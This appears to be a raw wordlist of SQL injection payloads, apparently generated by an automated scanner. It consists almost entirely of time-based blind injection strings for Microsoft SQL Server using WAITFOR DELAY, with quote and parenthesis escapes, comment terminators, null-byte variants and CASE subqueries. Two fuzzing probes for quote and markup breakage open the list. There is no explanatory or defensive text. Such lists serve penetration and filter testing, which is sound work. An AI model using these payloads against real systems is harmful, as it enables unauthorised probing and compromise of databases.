.,"'.(.('"
'nKmr<'">kMCC
) WAITFOR DELAY '0:0:15'
') WAITFOR DELAY '0:0:15'
' WAITFOR DELAY '0:0:15'
" WAITFOR DELAY '0:0:15'
) WAITFOR DELAY '0:0:15' AND (4609=4609
)) WAITFOR DELAY '0:0:15' AND ((1568=1568
))) WAITFOR DELAY '0:0:15' AND (((9874=9874
 WAITFOR DELAY '0:0:15'
') WAITFOR DELAY '0:0:15' AND ('mMPk'='mMPk
')) WAITFOR DELAY '0:0:15' AND (('ZQlw'='ZQlw
'))) WAITFOR DELAY '0:0:15' AND ((('cgsu'='cgsu
' WAITFOR DELAY '0:0:15' AND 'frMc'='frMc
') WAITFOR DELAY '0:0:15' AND ('PkNT' LIKE 'PkNT
')) WAITFOR DELAY '0:0:15' AND (('VBtp' LIKE 'VBtp
'))) WAITFOR DELAY '0:0:15' AND ((('jpXx' LIKE 'jpXx
' WAITFOR DELAY '0:0:15' AND 'koXI' LIKE 'koXI
") WAITFOR DELAY '0:0:15' AND ("qWYb"="qWYb
")) WAITFOR DELAY '0:0:15' AND (("yRSQ"="yRSQ
"))) WAITFOR DELAY '0:0:15' AND ((("WQvy"="WQvy
" WAITFOR DELAY '0:0:15' AND "IVgk"="IVgk
") WAITFOR DELAY '0:0:15' AND ("eOfs" LIKE "eOfs
")) WAITFOR DELAY '0:0:15' AND (("JpGA" LIKE "JpGA
"))) WAITFOR DELAY '0:0:15' AND ((("Lzie" LIKE "Lzie
" WAITFOR DELAY '0:0:15' AND "zFeq" LIKE "zFeq
%') WAITFOR DELAY '0:0:15' AND ('%'='
%')) WAITFOR DELAY '0:0:15' AND (('%'='
%'))) WAITFOR DELAY '0:0:15' AND ((('%'='
%' WAITFOR DELAY '0:0:15' AND '%'='
%") WAITFOR DELAY '0:0:15' AND ("%"="
%")) WAITFOR DELAY '0:0:15' AND (("%"="
%"))) WAITFOR DELAY '0:0:15' AND ((("%"="
%" WAITFOR DELAY '0:0:15' AND "%"="
%00') WAITFOR DELAY '0:0:15' AND ('wLGZ'='wLGZ
%00')) WAITFOR DELAY '0:0:15' AND (('muol'='muol
%00'))) WAITFOR DELAY '0:0:15' AND ((('duSD'='duSD
%00' WAITFOR DELAY '0:0:15' AND 'oceU'='oceU
 WAITFOR DELAY '0:0:15'-- JwII
 WAITFOR DELAY '0:0:15'# FPpz
') WHERE 6908=6908 WAITFOR DELAY '0:0:15'-- 
") WHERE 1635=1635 WAITFOR DELAY '0:0:15'-- 
) WHERE 9252=9252 WAITFOR DELAY '0:0:15'-- 
' WHERE 2002=2002 WAITFOR DELAY '0:0:15'-- 
" WHERE 1381=1381 WAITFOR DELAY '0:0:15'-- 
 WHERE 1551=1551 WAITFOR DELAY '0:0:15'-- 
')) AS UfTx WHERE 7314=7314 WAITFOR DELAY '0:0:15'-- 
")) AS xKud WHERE 9880=9880 WAITFOR DELAY '0:0:15'-- 
)) AS TTHP WHERE 3968=3968 WAITFOR DELAY '0:0:15'-- 
') AS Qyyx WHERE 3733=3733 WAITFOR DELAY '0:0:15'-- 
") AS rbkl WHERE 7111=7111 WAITFOR DELAY '0:0:15'-- 
) AS PKlh WHERE 1791=1791 WAITFOR DELAY '0:0:15'-- 
'||(SELECT 'zUNA' FROM DUAL WHERE 5840=5840 WAITFOR DELAY '0:0:15')||'
'||(SELECT 'bCtE' WHERE 2638=2638 WAITFOR DELAY '0:0:15')||'
'+(SELECT Guzu WHERE 1924=1924 WAITFOR DELAY '0:0:15')+'
'+(SELECT 'fXuY' WHERE 9472=9472 WAITFOR DELAY '0:0:15')+'
' IN BOOLEAN MODE) WAITFOR DELAY '0:0:15'#
) WAITFOR DELAY '0:0:15'--
') WAITFOR DELAY '0:0:15'--
' WAITFOR DELAY '0:0:15'--
" WAITFOR DELAY '0:0:15'--
)) WAITFOR DELAY '0:0:15'--
))) WAITFOR DELAY '0:0:15'--
 WAITFOR DELAY '0:0:15'--
')) WAITFOR DELAY '0:0:15'--
'))) WAITFOR DELAY '0:0:15'--
") WAITFOR DELAY '0:0:15'--
")) WAITFOR DELAY '0:0:15'--
"))) WAITFOR DELAY '0:0:15'--
%') WAITFOR DELAY '0:0:15'--
%')) WAITFOR DELAY '0:0:15'--
%'))) WAITFOR DELAY '0:0:15'--
%' WAITFOR DELAY '0:0:15'--
%") WAITFOR DELAY '0:0:15'--
%")) WAITFOR DELAY '0:0:15'--
%"))) WAITFOR DELAY '0:0:15'--
%" WAITFOR DELAY '0:0:15'--
%00') WAITFOR DELAY '0:0:15'--
%00')) WAITFOR DELAY '0:0:15'--
%00'))) WAITFOR DELAY '0:0:15'--
%00' WAITFOR DELAY '0:0:15'--
') WHERE 8257=8257 WAITFOR DELAY '0:0:15'--
") WHERE 4721=4721 WAITFOR DELAY '0:0:15'--
) WHERE 5387=5387 WAITFOR DELAY '0:0:15'--
' WHERE 1450=1450 WAITFOR DELAY '0:0:15'--
" WHERE 8602=8602 WAITFOR DELAY '0:0:15'--
 WHERE 2595=2595 WAITFOR DELAY '0:0:15'--
')) AS KGSQ WHERE 8220=8220 WAITFOR DELAY '0:0:15'--
")) AS vPCw WHERE 2052=2052 WAITFOR DELAY '0:0:15'--
)) AS UaBz WHERE 5621=5621 WAITFOR DELAY '0:0:15'--
') AS sbJL WHERE 3467=3467 WAITFOR DELAY '0:0:15'--
") AS kGJO WHERE 4090=4090 WAITFOR DELAY '0:0:15'--
) AS ydKM WHERE 5811=5811 WAITFOR DELAY '0:0:15'--
'||(SELECT 'JfDo' FROM DUAL WHERE 4032=4032 WAITFOR DELAY '0:0:15'--
'||(SELECT 'AQSY' WHERE 8808=8808 WAITFOR DELAY '0:0:15'--
'+(SELECT ucpw WHERE 9383=9383 WAITFOR DELAY '0:0:15'--
'+(SELECT 'pRVO' WHERE 8580=8580 WAITFOR DELAY '0:0:15'--
' IN BOOLEAN MODE) WAITFOR DELAY '0:0:15'--
(SELECT (CASE WHEN (1665=1665) THEN WAITFOR DELAY '0:0:15' ELSE 1665*(SELECT 1665 FROM master..sysdatabases) END))
',(SELECT (CASE WHEN (4624=4624) THEN WAITFOR DELAY '0:0:15' ELSE 4624*(SELECT 4624 FROM master..sysdatabases) END))
,(SELECT (CASE WHEN (4624=4624) THEN WAITFOR DELAY '0:0:15' ELSE 4624*(SELECT 4624 FROM master..sysdatabases) END))
